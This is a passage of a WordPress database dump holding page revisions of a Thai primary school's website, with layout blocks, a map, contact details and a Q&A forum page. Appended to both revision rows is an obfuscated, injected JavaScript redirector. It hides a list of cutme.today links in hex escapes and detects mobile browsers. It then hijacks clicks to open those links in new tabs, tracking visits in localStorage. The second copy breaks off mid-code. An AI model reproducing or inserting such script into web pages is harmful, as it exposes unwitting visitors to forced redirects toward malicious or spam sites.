500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#32e6a4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-02 15:50:35','2024-08-02 08:50:35','',14,'http://pakhaeng.ssk.in.th/?p=504',0,'revision','',0),
(506,1,'2024-08-03 21:25:27','2024-08-03 14:25:27','<!-- wp:html -->\n<div class=\"padlet-embed\" style=\"border:1px solid rgba(0,0,0,0.1);border-radius:2px;box-sizing:border-box;overflow:hidden;position:relative;width:100%;background:#F4F4F4\"><p style=\"padding:0;margin:0\"><iframe src=\"https://padlet.com/embed/t6cp72y5yag8ndh7\" frameborder=\"0\" allow=\"camera;microphone;geolocation\" style=\"width:100%;height:608px;display:block;padding:0;margin:0\"></iframe></p><div style=\"display:flex;align-items:center;justify-content:end;margin:0;height:28px\"><a href=\"https://padlet.com?ref=embed\" style=\"display:block;flex-grow:0;margin:0;border:none;padding:0;text-decoration:none\" target=\"_blank\" rel=\"noopener\"><div style=\"display:flex;align-items:center;\"><img src=\"https://padlet.net/embeds/made_with_padlet_2022.png\" width=\"114\" height=\"28\" style=\"padding:0;margin:0;background:0 0;border:none;box-shadow:none\" alt=\"สร้างขึ้นด้วย Padlet\"></div></a></div></div>\n<!-- /wp:html -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"c65da3cd\",\"blockVersion\":3,\"typography\":{\"textAlign\":\"center\"},\"borders\":{\"borderBottomColor\":\"#cf2e2e\"},\"backgroundColor\":\"#7bdcb5\",\"textColor\":\"#000000\",\"linkColor\":\"#ff6900\",\"linkColorHover\":\"#9b51e0\",\"highlightTextColor\":\"#ff6900\",\"iconColor\":\"#f78da7\"} -->\n<h2 class=\"gb-headline gb-headline-c65da3cd gb-headline-text\">เพิ่ม กระทู้คำถาม</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:shortcode -->\n[qa_add_question]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"26f662fa\",\"blockVersion\":3,\"typography\":{\"textAlign\":\"center\"},\"backgroundColor\":\"#7bdcb5\",\"linkColor\":\"#9b51e0\",\"linkColorHover\":\"#ff6900\"} -->\n<h2 class=\"gb-headline gb-headline-26f662fa gb-headline-text\">กระทู้ถาม-ตอบทั้งหมด</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[question_archive]\n<!-- /wp:shortcode -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const 